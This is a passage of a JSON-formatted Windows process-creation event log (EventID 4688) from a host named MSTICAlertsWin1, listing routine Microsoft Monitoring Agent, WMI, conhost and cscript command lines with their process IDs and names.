State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 